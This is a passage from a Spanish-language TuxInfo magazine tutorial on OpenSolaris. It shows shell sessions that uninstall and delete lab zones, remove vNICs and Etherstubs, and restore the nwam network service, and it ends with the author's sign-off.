/zones/host2
ipkg
excl
- cliente
installed
/zones/cliente
ipkg
excl
- vrouter
installed
/zones/vrouter
ipkg
excl
root@battlelloyd-o:~# zoneadm -z host1 uninstall
Are you sure you want to uninstall zone host1 (y/[n])? y
root@battlelloyd-o:~# zoneadm -z host2 uninstall
Are you sure you want to uninstall zone host2 (y/[n])? y
root@battlelloyd-o:~# zoneadm -z cliente uninstall
Are you sure you want to uninstall zone cliente (y/[n])? y
root@battlelloyd-o:~# zoneadm -z vrouter uninstall
Are you sure you want to uninstall zone vrouter (y/[n])? y

Acto seguido, desconfiguramos todas las máquinas virtuales:
root@battlelloyd-o:~# zoneadm list -icv
ID NAME
STATUS
PATH
BRAND
IP
0 global
running
/
ipkg
shared
- vmtipo
installed
/zones/vmtipo
ipkg
excl
- host1
configured /zones/host1
ipkg
excl
- host2
configured /zones/host2
ipkg
excl
- cliente
configured /zones/cliente
ipkg
excl
- vrouter
configured /zones/vrouter
ipkg
excl
root@battlelloyd-o:~# zonecfg -z host1 delete
Are you sure you want to delete zone host1 (y/[n])? y
root@battlelloyd-o:~# zonecfg -z host2 delete
Are you sure you want to delete zone host2 (y/[n])? y
root@battlelloyd-o:~# zonecfg -z cliente delete
Are you sure you want to delete zone cliente (y/[n])? y
root@battlelloyd-o:~# zonecfg -z vrouter delete
Are you sure you want to delete zone vrouter (y/[n])? y

71 www.tuxinfo.com.ar



Ahora legó la hora de bor ar las vNICs:
root@battlelloyd-o:~# dladm show-vnic
LINK

OVER
SPEED
MACADDRESS
MACADDRTYPE
VID
vnic1
Etherstub1
0
2:8:20:51:4a:a0
random
0
vnic2
Etherstub1
0
2:8:20:a:bc:dc
random
0
vnic3
Etherstub1
0
2:8:20:fd:b4:1f
random
0
vnic4
Etherstub2
0
2:8:20:35:45:ef
random
0
vnic5
Etherstub2
0
2:8:20:e6:5d:cc
random
0
root@battlelloyd-o:~# dladm delete-vnic vnic1
root@battlelloyd-o:~# dladm delete-vnic vnic2
root@battlelloyd-o:~# dladm delete-vnic vnic3
root@battlelloyd-o:~# dladm delete-vnic vnic4
root@battlelloyd-o:~# dladm delete-vnic vnic5
root@battlelloyd-o:~# dladm show-vnic

Luego seguiremos con los Etherstubs:
root@battlelloyd-o:~# dladm show-etherstub
LINK
Etherstub1
Etherstub2
root@battlelloyd-o:~# dladm delete-etherstub Etherstub1
root@battlelloyd-o:~# dladm delete-etherstub Etherstub2
root@battlelloyd-o:~# dladm show-etherstub

Y finalmente, volveremos nuestra configuración a “nwam”, es decir, Network Magic:
root@battlelloyd-o:~# svcs physical:default
STATE

STIME
FMRI
online
16:59:10 svc:/network/physical:default
root@battlelloyd-o:~# svcadm disable physical:default
root@battlelloyd-o:~# svcadm enable physical:nwam
root@battlelloyd-o:~# svcs physical:nwam
STATE

STIME
FMRI
online
16:57:32 svc:/network/physical:nwam
Listo, nuestra máquina es como era
entonces.
Conclusión
En esta entrega hemos podido
observar todo el circuito necesario
Hernán “HeCSa” Saltiel
para consolidar los conocimientos
AOSUG leader
que hemos incorporado en la
CaFeLUG Member
entrega pasada. Espero que la
Boca happy fan
hayan disfrutado tanto como yo.
Club Amigos de Pumper Nic
¡Nos vemos!
hsaltiel@gmail.com
ht p:/ www.aosug.com.ar
72 www.tuxinfo.com.ar